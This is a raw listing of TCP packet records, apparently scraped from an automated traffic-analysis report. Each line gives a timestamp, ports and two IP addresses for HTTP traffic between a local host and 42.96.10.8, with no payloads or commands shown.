                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053841114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053920984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053931952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053945065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053956032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053962946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053965092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053973913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053997040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.053997040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054114103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054125071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054135084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054145098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054157972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054162979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054168940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054172993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054174900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054174900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054186106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054209948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054301023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054327011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054337978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054347992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054358006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054368973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054379940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054392099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054394960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054394960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054413080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054569960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054589033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054599047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054608107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054609060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054620981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054630995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054641962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054651976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054658890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054658890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054663897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054675102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054685116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054694891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054694891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054694891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054706097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054711103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054724932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054737091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054752111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054763079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054771900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054771900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054773092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054785013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054795980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054807901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054816961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054824114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054824114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054851055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054902077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054913998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054924011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054935932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054945946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054955959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054963112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054963112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054966927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054979086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054989100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.054997921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055001020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055001020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055011034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055052996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055052996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055078983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055089951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055100918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055110931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055118084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055248976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055262089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055273056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055283070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055294037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055303097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055320978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055330038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055330038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055331945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055344105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055355072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055366039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055366993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055382967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055385113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055393934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055406094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055416107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055428982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055434942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055434942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055442095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055450916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055453062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055466890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055476904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055481911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055493116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055504084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055515051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055515051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055515051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055624008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055633068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055636883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055648088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055656910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055663109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055664062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055664062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055674076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055686951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055696011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055701971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055701971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055704117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055742025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055742025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055804014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055815935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055826902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055838108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055840969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055850029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055860996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055865049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055871964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055882931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055892944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055902958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055910110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055910110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055915117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055932999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055948019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055958033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055974960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055984974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055984974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055986881 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.055998087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056009054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056020021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056041002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056041002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056238890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056248903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056253910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056265116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056274891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056286097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056304932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056307077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056307077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056315899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056325912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056335926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056346893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056358099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056358099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056360006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056371927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056381941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056391954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056402922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056411982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056411982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056415081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056427002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056427002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056438923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056457043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056468010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056478977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056478977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056478977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056488991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056499958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056510925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056520939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056535959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056536913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056535959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056550026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056560993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056571007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056581020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056591034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056593895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056593895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056601048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056629896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056631088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056690931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056710005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056721926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056731939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056741953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056751013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056751013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056761980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056775093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056775093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056786060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056787968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056798935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056809902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056819916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056830883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056837082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056837082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056840897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056854010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056874990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.056874990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057086945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057097912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057107925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057117939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057127953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057137012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057138920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057173014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057173014 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057235956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057248116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057257891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057269096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057277918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057279110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057313919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057313919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057578087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057588100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057598114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057663918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057665110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057676077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057687044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057704926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057739973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057739973 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057940960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057955027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057964087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.057976007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058001995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058001995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058199883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058211088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058219910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058238983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058248997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058257103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058265924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058269978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058269978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058274984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058284044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058291912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058298111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058306932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058306932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058306932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058306932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058315992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058326006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058346987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058438063 CET4973380192.168.2.442.96.10.8
